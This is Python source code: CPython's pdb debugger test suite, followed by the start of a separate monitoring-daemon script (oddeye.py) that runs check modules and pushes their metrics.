> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoing is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13210(self):
# invoking "continue" on a non-main thread triggered an exception
# inside signal.signal
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
oddeye.py
|
import glob
import os
import sys
import time
import logging
import threading
from lib.daemon import Daemon
import lib.upload_cached
import lib.run_bash
import lib.pushdata
import lib.puylogger
import lib.getconfig
import gc
sys.path.append(os.path.dirname(os.path.realpath("__file__"))+'/checks_enabled')
sys.path.append(os.path.dirname(os.path.realpath("__file__"))+'/lib')
cron_interval = int(lib.getconfig.getparam('SelfConfig', 'check_period_seconds'))
log_file = lib.getconfig.getparam('SelfConfig', 'log_file')
pid_file = lib.getconfig.getparam('SelfConfig', 'pid_file')
tsdb_type = lib.getconfig.getparam('TSDB', 'tsdtype')
library_list = []
os.chdir("checks_enabled")
checklist = glob.glob("check_*.py")
logger = logging.getLogger("PuyPuy")
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
handler = logging.FileHandler(log_file)
handler.setFormatter(formatter)
logger.addHandler(handler)
def run_shell_scripts():
lib.run_bash.run_shell_scripts()
module_names = []
for checks in checklist:
module_names.append(checks.split('.')[0])
modules = map(__import__, module_names)
cluster_name = lib.getconfig.getparam('SelfConfig', 'cluster_name')
extra_tags = ('chart_type', 'check_type')
jsondata = lib.pushdata.JonSon()
def run_scripts():
try:
start_gtime = time.time()
jsondata.prepare_data()
for modol in modules:
try:
# jsondata.prepare_data()
start_time = time.time()
a = modol.runcheck()
time_elapsed = "{:.9f}".format(time.time() - start_time) + " seconds"
message = time_elapsed + ' ' + str(modol).split("'")[1]
for b in a:
if 'reaction' not in b:
b.update({'reaction': 0})
for extra_tag in extra_tags:
if extra_tag not in b:
b.update({extra_tag: 'None'})
jsondata.gen_data(b['name'], b['timestamp'], b['value'], lib.pushdata.hostname, b['check_type'], cluster_name, b['reaction'], b['chart_type'])
# jsondata.put_json()
lib.puylogger.print_message(message)
except Exception as e:
lib.puylogger.print_message(str(e))
jsondata.put_json()
time_elapsed2 = '{:.9f}'.format(time.time() - start_gtime) + ' seconds '
lib.puylogger.print_message('Spent ' + time_elapsed2 + 'to complete interation')
except Exception as e:
lib.puylogger.print_message(str(e))
def upload_cache():
lib.upload_cached.cache_uploader()
